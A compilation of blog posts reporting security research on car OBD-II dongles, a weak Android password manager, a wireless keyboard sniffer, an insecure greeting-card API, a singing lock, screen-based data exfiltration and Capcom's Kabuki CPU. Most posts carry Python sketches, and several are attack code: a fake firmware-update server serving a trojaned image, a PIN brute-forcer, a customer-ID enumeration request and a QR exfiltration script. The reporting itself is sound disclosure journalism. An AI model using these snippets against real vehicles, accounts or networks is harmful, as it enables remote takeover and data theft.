
Remotely Controlling Automobiles Via Insecure Dongles

Automobiles are getting smarter and smarter. Nowadays many vehicles run on a mostly drive-by-wire system, meaning that a majority of the controls are handled electronically. We're not just talking about the window or seat adjustment controls, but also the instrument cluster, steering, brakes, and accelerator. These systems can make the driving experience better, but they also introduce an interesting avenue of attack. If the entire car is controlled by a computer, then what if an attacker were to gain control of that computer? You may think that's nothing to worry about, because an attacker would have no way to remotely access your vehicle's computer system. It turns out this isn't so hard after all. Two recent research projects have shown that some OBD-II dongles are very susceptible to attack.

The first was an attack on a device called Zubie. Zubie is a dongle that you can purchase to plug into your vehicle's OBD-II diagnostic port. The device can monitor sensor data from your vehicle and then perform logging and reporting back to your smartphone. It also includes a built-in GPRS modem to connect back to the Zubie cloud. One of the first things the Argus Security research team noticed when dissecting the Zubie was that it included what appeared to be a diagnostic port inside the OBD-II connector.

Online documentation showed the researchers that this was a +2.8V UART serial port. With minimal effort, they were able to talk to it from a computer. Once connected, they were presented with an AT command interface with no authentication. Next, the team decompiled all of the Python .pyo files to recover the original scripts. After reading through these, they were able to reverse engineer the protocol used between the Zubie and the cloud. One particularly interesting finding was that the device would accept firmware updates every time it checked in with the cloud.
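
For anyone curious what that first poke looks like, here is a minimal sketch of talking to an exposed UART with pyserial. The port name, baud rate, and AT commands are placeholders for illustration, not values from the Zubie write-up, and the +2.8V logic level means you'd want a level-shifting USB-serial adapter in between.

```python
# Minimal sketch: probing an unauthenticated UART diagnostic port with pyserial.
# Port name, baud rate, and commands are placeholders, not values from the write-up.
import serial

PORT = "/dev/ttyUSB0"   # USB-serial adapter wired (through a level shifter) to the UART pads
BAUD = 115200           # common default; the real rate would come from the documentation

with serial.Serial(PORT, BAUD, timeout=2) as uart:
    uart.write(b"AT\r\n")    # basic liveness check
    print(uart.read(64).decode(errors="replace"))

    uart.write(b"ATI\r\n")   # ask the modem side to identify itself
    print(uart.read(256).decode(errors="replace"))
```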

The team then set up a rogue cellular tower to perform a man-in-the-middle attack against the Zubie. This allowed them to control the DNS responses for the Zubie cloud hostname. The Zubie then connected to the team's own server and downloaded a fake update crafted by the research team. This acted as a trojan horse, which allowed the team to control various aspects of the vehicle remotely over the cellular connection. Functions included tracking the vehicle's location, unlocking the doors, and manipulating the instrument cluster. All of this could be done from anywhere in the world, as long as the vehicle has a cellular signal.
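
To make that attack flow concrete, here is a rough sketch of the attacker-side update server. It assumes the rogue tower's DNS already points the Zubie's update hostname at the attacker's machine, and the filename and framing are made up; the real update protocol was reverse engineered from the decompiled scripts.

```python
# Hypothetical fake-update server: once DNS for the update host resolves to this machine,
# any plain-HTTP firmware request is answered with a trojaned image. Names are placeholders.
from http.server import BaseHTTPRequestHandler, HTTPServer

TROJANED_IMAGE = "update.bin"   # crafted firmware package (placeholder filename)

class FakeUpdateHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        with open(TROJANED_IMAGE, "rb") as fw:
            payload = fw.read()
        self.send_response(200)
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

# Port 80 needs elevated privileges; a real setup also depends on the DNS redirection above.
HTTPServer(("0.0.0.0", 80), FakeUpdateHandler).serve_forever()
```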

A separate but similar project was also recently discussed by [Corey Thuen] at the S4x15 security conference. He didn't attack the Zubie, but rather a similar device. If you are a Progressive insurance customer, you may know that the company offers a device called Snapshot that monitors your driving habits via the OBD-II port. In exchange for providing this data, the company may offer you lower rates. This device also has a cellular modem to upload data back to Progressive.

After some research, [Thuen] found multiple security flaws in Progressive's tracker. For one, the firmware is neither signed nor validated. On top of that, the system does not authenticate to the cellular network, or even encrypt its Internet traffic. This leaves the system wide open to a man-in-the-middle attack. In fact, [Thuen] mentions that the system could be hacked with a rogue cellular tower, just like the researchers did with the Zubie. [Thuen] didn't take his research that far, but he likely doesn't have to in order to prove his point.
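
To put the "neither signed nor validated" finding in perspective, the check the dongle is missing is only a few lines. The sketch below is not anything from the actual device; it just illustrates, with an assumed Ed25519 vendor key and image format, what verifying a firmware image before flashing it would look like.

```python
# Illustration of the missing control: refuse any firmware image that doesn't carry a
# valid vendor signature. Key and image handling are assumptions, not the device's code.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

def firmware_is_authentic(image: bytes, signature: bytes, vendor_pubkey: bytes) -> bool:
    """Return True only if the image verifies against the vendor's public key."""
    key = Ed25519PublicKey.from_public_bytes(vendor_pubkey)
    try:
        key.verify(signature, image)
        return True
    except InvalidSignature:
        return False
```

Without a check like this, and with unauthenticated, unencrypted transport, anything that can get between the dongle and its server can hand it arbitrary code.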

The first research team provided their findings to Zubie, who have reportedly fixed some of the issues. Progressive released a statement saying they hadn't heard anything from [Thuen], but that they would be happy to listen to his findings. These are just two examples out of the many devices on the market that perform the same functions, and it's very likely that others share similar weaknesses. Hopefully, with findings like this made public, these companies will start to take security more seriously before it turns into a big problem.

[Thanks Ellery]


Tearing Apart An Android Password Manager

With all of the various web applications we use nowadays, it can be daunting to remember all of those passwords. Many people turn to password management software to help with this. Rather than remembering 20 passwords, you can store them all in a (presumably) secure database that's protected by a single strong password. It's a good idea in theory, but only if the software is actually secure. [Matteo] was recently poking around an Android password management app and made some disturbing discoveries.

The app claimed to be using DES encryption, but [Matteo] wanted to put this claim to the test. He first decompiled the app to get a look at the code. The developer had run it through some kind of code obfuscation software, but that really didn't help very much. From there, [Matteo] located the password decryption routine.

The first thing he noticed was that the software uses DES in ECB mode, which has known weaknesses and really shouldn't be used for this sort of thing. Second, the software simply uses an eight-digit PIN as the encryption key, which gives at most 100 million possible combinations. That may sound like a lot, but to a computer it's nothing. The third problem was that if the PIN is shorter than eight digits, the same digits are repeated to pad it out to the full length. Since most people tend to use four-digit PINs, this can reduce the effective keyspace to just ten thousand combinations.
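
To see just how little "cracking" is involved, here is a rough brute-force sketch against that kind of scheme using pycryptodome. The PIN-to-key padding follows the repetition rule described above, while the plaintext marker used to recognize a correct guess is an assumption for illustration.

```python
# Sketch of why a PIN-derived DES-ECB key collapses: the whole attack is a loop over PINs.
from Crypto.Cipher import DES  # pycryptodome

def pin_to_key(pin: str) -> bytes:
    """Repeat a short PIN out to the 8 bytes DES expects, e.g. '1234' -> '12341234'."""
    return (pin * 8)[:8].encode("ascii")

def brute_force(ciphertext: bytes, known_prefix: bytes) -> str | None:
    """Try every 4-digit PIN (10,000 candidates); even the full 8-digit space is only 10^8."""
    for candidate in range(10_000):
        pin = f"{candidate:04d}"
        cipher = DES.new(pin_to_key(pin), DES.MODE_ECB)
        if cipher.decrypt(ciphertext).startswith(known_prefix):
            return pin
    return None
```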

As if that wasn't bad enough, it gets worse. [Matteo] found a function that stores the PIN in a plain-text file when it is first generated. When it comes time to decrypt a password, the application simply checks the PIN you enter against the one stored in that plain-text file. So really, you don't have to crack the encryption at all. You can simply open the file and read off the PIN.

[Matteo] doesn't name the specific app he was testing, but he did say in the Reddit thread that the developer was supposedly pushing out a patch to fix these issues. Regardless, it goes to show that before choosing a password manager you should really do some research and make sure the developer can be trusted, lest your secrets fall into the wrong hands.

[via Reddit]

Keystroke Sniffer Hides As A Wall Wart, Is Scary

For those of us who worry about the security of our wireless devices, every now and then something comes along that scares even the already-paranoid. The latest is a device from [Samy] that is able to log the keystrokes from Microsoft keyboards by sniffing and decrypting the RF signals used in the keyboard’s wireless protocol. Oh, and the entire device is camouflaged as a USB wall wart-style power adapter.

The device is made possible by an Arduino or Teensy hooked up to an nRF24L01+ 2.4GHz RF chip that does the sniffing. Once the firmware for the Arduino is loaded, the two chips plus a USB charging circuit (for charging USB devices and maintaining the camouflage) are stuffed with a lithium battery into a plastic shell from a larger USB charger. The options for retrieving the sniffed data are either an SPI serial flash chip or a GSM module that sends the data out automatically via SMS.
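
As for the "decrypting" part, coverage of [Samy]'s KeySweeper notes that these Microsoft keyboards scramble each keystroke packet by XORing it with the keyboard's own MAC address, which is transmitted in the clear. The sketch below is a simplified illustration of that idea, not the exact frame format the firmware parses, and the sample bytes are made up.

```python
# Simplified illustration: recover keystroke bytes by XORing the sniffed payload with the
# keyboard's MAC address. Packet layout and the sample values below are made up.
def decrypt_payload(payload: bytes, mac: bytes) -> bytes:
    """XOR each payload byte against the repeating MAC address."""
    return bytes(b ^ mac[i % len(mac)] for i, b in enumerate(payload))

sniffed_payload = bytes.fromhex("0a98c4d31f")   # made-up capture
keyboard_mac = bytes.fromhex("cd1234567890")    # made-up MAC seen in the clear
print(decrypt_payload(sniffed_payload, keyboard_mac).hex())
```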

The scary thing here isn't so much that this device exists, but that the encryption on Microsoft's keyboards is less than stellar and provides little more than a false sense of security. It also serves as a wake-up call that the things we don't even give a passing glance might be exactly where a less-honorable person looks to exploit whatever information they can get their hands on. Continue past the break for a video of this device in action, and be sure to check out the project in more detail, including source code and schematics, on [Samy]'s webpage.

Thanks to [Juddy] for the tip!

Continue reading “Keystroke Sniffer Hides As A Wall Wart, Is Scary”


When Responsible Disclosure Isn’t Enough

Moonpig is a well-known greeting card company in the UK. You can use their services to send personalized greeting cards to your friends and family. [Paul] decided to do some digging around and discovered a few security vulnerabilities in the way the Moonpig Android app talks to the company's API.

First of all, [Paul] noticed that the system was using HTTP basic authentication. This is not ideal, but the company was at least using SSL encryption to protect the customer credentials. After decoding the authentication header, [Paul] noticed something strange. His customer ID was in the request, but the username and password being sent along with it were not his own credentials at all.

[Paul] created a new account and found that the credentials were the same. By modifying the customer ID in the HTTP request of his second account, he was able to trick the website into spitting out all of the saved address information of his first account. This meant that there was essentially no authentication at all. Any user could impersonate another user. Pulling address information may not sound like a big deal, but [Paul] claims that every API request was like this. This meant that you could go as far as placing orders under other customer accounts without their consent.
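
In code, the flaw boils down to something like the sketch below: the basic-auth pair is effectively ignored, and whatever customer ID you supply is trusted. The endpoint, parameter names, and credentials here are placeholders, not the real Moonpig API.

```python
# Hedged sketch of an insecure-direct-object-reference request. All names are placeholders.
import requests

API_BASE = "https://api.moonpig.example.invalid"   # placeholder, not the real endpoint
STATIC_AUTH = ("app_user", "app_password")          # the same pair every install sends (per the write-up)

def get_saved_addresses(customer_id: int) -> dict:
    """Returns the saved addresses for *any* customer ID, regardless of who 'logged in'."""
    resp = requests.get(
        f"{API_BASE}/address/list",
        params={"customerId": customer_id},
        auth=STATIC_AUTH,
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

# Simply iterating customer_id over a range would enumerate every account on the service.
```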

[Paul] used Moonpig's API help files to locate more interesting methods. One that stood out to him was the GetCreditCardDetails method. [Paul] gave it a shot, and sure enough the system dumped out credit card details including the last four digits of the card, the expiration date, and the name associated with it. It may not be full card numbers, but this is still obviously a pretty big problem that would be fixed immediately… right?

[Paul] disclosed the vulnerability responsibly to Moonpig in August 2013. Moonpig responded by saying the problem was due to legacy code and would be fixed promptly. A year later, [Paul] followed up and was told it should be resolved before Christmas. On January 5, 2015, the vulnerability was still not fixed, so [Paul] decided that enough was enough and published his findings online to help press the issue. It seems to have worked. Moonpig has since disabled its API and released a statement via Twitter claiming that "all password and payment information is and has always been safe". That's great and all, but it would mean a bit more if the passwords actually mattered.


SingLock Protects Your Valuables From Shy People

Two Cornell students have designed their own multi-factor authentication system that combines a PIN with a form of voice recognition. It's not as simple as speaking a passphrase, though. Instead, you have to sing the correct tones into the lock.

The system runs on an Atmel ATmega1284P. The chip isn't powerful enough to easily recognize actual human speech, so the team decided to focus their effort on detecting pitch instead. The result is a lock that requires you to sing the perfect sequence of pitches. We would be worried about an attacker eavesdropping and attempting to sing the key themselves, but the team has a few mechanisms in place to protect against this. First, the system requires a valid PIN, which an attacker can't deduce simply by listening from around the corner. Second, the system also keeps track of the user's specific voice signature.
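
The actual implementation is fixed-point C running on the ATmega1284P, but the pitch-matching idea can be sketched in a few lines of Python with numpy: grab short audio frames, find the dominant frequency in each, and compare the sequence against the stored key. The sample rate, frame handling, and tolerance below are arbitrary choices, not values from the students' report.

```python
# Illustrative pitch-matching sketch (not the ATmega1284P firmware). Thresholds are arbitrary.
import numpy as np

SAMPLE_RATE = 8000  # Hz, assumed

def dominant_pitch(frame: np.ndarray) -> float:
    """Return the strongest frequency component of one audio frame, in Hz."""
    windowed = frame * np.hamming(len(frame))
    spectrum = np.abs(np.fft.rfft(windowed))
    freqs = np.fft.rfftfreq(len(frame), d=1.0 / SAMPLE_RATE)
    return float(freqs[np.argmax(spectrum)])

def matches_key(frames: list[np.ndarray], key_hz: list[float], tolerance_hz: float = 25.0) -> bool:
    """True only if every sung note lands within tolerance of the stored pitch sequence."""
    if len(frames) != len(key_hz):
        return False
    return all(abs(dominant_pitch(f) - k) <= tolerance_hz for f, k in zip(frames, key_hz))
```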

The project page delves much more deeply into the mathematical theory behind how the system works. It’s worth a read if you are a math or audio geek. Check out the video below for a demonstration. Continue reading “SingLock Protects Your Valuables From Shy People”

Downloading Data Through The Display

HIPAA – the US standard for electronic health care documentation – spends a lot of verbiage and bureaucratese on the security of electronic records, making a clear distinction between the use of records by health care workers and the disclosure of records by health care workers. Likewise, the Federal Information Security Management Act of 2002 makes the same distinction; records that should never be disclosed or transmitted should only be used on systems that are disconnected from networks.

This distinction between use and disclosure or transmission is of course a farce; if you can display something on a screen, it can be transmitted. [Ian Latter] recently gave a talk at Kiwicon that provides the tools to do just that. He calls it ThruGlassXfer (TGXf), and it does exactly what it says on the tin: anything that can be displayed on a screen can be transmitted. All you need are the right tools.
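
The idea is simple enough to sketch: chop a file into chunks, paint each chunk on the screen as a QR code, and let a camera on the other side of the glass reassemble the stream. The sketch below uses the common qrcode Python package with an arbitrary chunk size and framing; TGXf defines its own protocol, and the filename is just a placeholder.

```python
# Screen-as-exfiltration-channel sketch: one QR code per file chunk. Framing is made up.
import base64
import qrcode  # pip install qrcode[pil]

CHUNK = 512  # payload bytes per frame (assumed)

def file_to_qr_frames(path: str):
    """Yield one PIL image per chunk, each tagged with a sequence number."""
    with open(path, "rb") as f:
        data = f.read()
    for seq, offset in enumerate(range(0, len(data), CHUNK)):
        payload = base64.b64encode(data[offset:offset + CHUNK]).decode()
        yield qrcode.make(f"{seq}:{payload}")

# Displaying (or saving) the frames in sequence turns any monitor into a one-way data
# channel that never touches the network.
for i, frame in enumerate(file_to_qr_frames("example_document.pdf")):  # placeholder filename
    frame.save(f"frame_{i:04d}.png")
```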

Continue reading “Downloading Data Through The Display”

Reverse Engineering Capcom’s Crypto CPU

There are a few old Capcom arcade titles – Pang, Cadillacs and Dinosaurs, and Block Block – that are unlike anything else ever seen in the world of coin-ops. They're old, yes, but what makes these titles exceptional is the CPU they run on. The brains of the hardware in these games is the Kabuki, a Z80 CPU with a few extra security features. Why would Capcom produce such a thing? To combat bootleggers who would copy and reproduce arcade games without paying royalties to the original publisher. It's an interesting part of arcade history, but also a problem for curators: this security has killed a number of arcade machines, leading [Eduardo] to reverse engineer and document the Kabuki in full detail.

While the normal Z80 CPU had a pin specifically dedicated to refreshing DRAM, the Kabuki repurposed this pin for the security functions on the chip. With this pin low, the Kabuki behaves as a standard Z80. When the pin is pulled high, it serves as a power supply input for the security features. The security – just a few bits saved in memory – was battery backed, and once this battery was disconnected, the keys vanished and the chip could no longer run its encrypted game, killing the board.

Plugging the Kabuki into an old Amstrad CPC 6128 without the security pin pulled high allowed [Eduardo] to test all the Z80 instructions, and there were no surprises; the Kabuki is fully compatible with every other Z80 on the planet. Determining how the Kabuki works with that special security pin pulled high is a more difficult task, but the MAME team has it nailed down.

The security system inside the Kabuki works through a series of bitswaps, circular shifts, and XORs, with a different translation depending on whether the byte is fetched as an opcode or as data. The process of encoding and decoding the security in the Kabuki is well understood, but [Eduardo] had a few unanswered questions. What happens after the Kabuki loses power and the memory contents – especially the bitswap, address, and XOR keys – vanish? How was the Kabuki programmed in the factory? Is it possible to reprogram these security keys, allowing one Kabuki to play games it wasn't manufactured for?
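
For a feel of what that transform looks like, here is an illustrative toy model in Python. The bit orders, shift amounts, and XOR values below are invented for the example; the real per-game keys and the exact ordering of the steps live in MAME's Kabuki decryption code.

```python
# Toy model of a Kabuki-style translation: bitswap, circular shift, and XOR, keyed
# differently for opcode fetches and data reads. Keys and tables here are made up.
def bitswap(value: int, order: tuple) -> int:
    """Rebuild an 8-bit value taking its bits from the given source positions, MSB first."""
    return sum(((value >> src) & 1) << (7 - dst) for dst, src in enumerate(order))

def rotl8(value: int, n: int) -> int:
    """Circular left shift of an 8-bit value."""
    return ((value << n) | (value >> (8 - n))) & 0xFF

def kabuki_style_decode(byte: int, is_opcode: bool) -> int:
    if is_opcode:
        swap, shift, xor_key = (6, 4, 2, 0, 7, 5, 3, 1), 3, 0x5A  # invented "opcode key"
    else:
        swap, shift, xor_key = (1, 3, 5, 7, 0, 2, 4, 6), 5, 0xC3  # invented "data key"
    return rotl8(bitswap(byte, swap), shift) ^ xor_key
```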

[Eduardo] figured that being able to encrypt new, valid code was the first step toward running code encrypted with different keys. To test this theory, he wrote a simple 'Hello World' for the Capcom hardware. The demo ran perfectly under MAME, but it didn't work when burned onto an EPROM and put into real Capcom hardware.

That's where this story ends, at least for the time being. The new encrypted code is valid and MAME runs it, but until [Eduardo] or someone else can figure out whatever additional configuration is hiding inside the Kabuki, this project is dead in its tracks. [Eduardo] will be back sometime next week tearing the Kabuki apart again, trying to unravel the mysteries of what makes this processor work.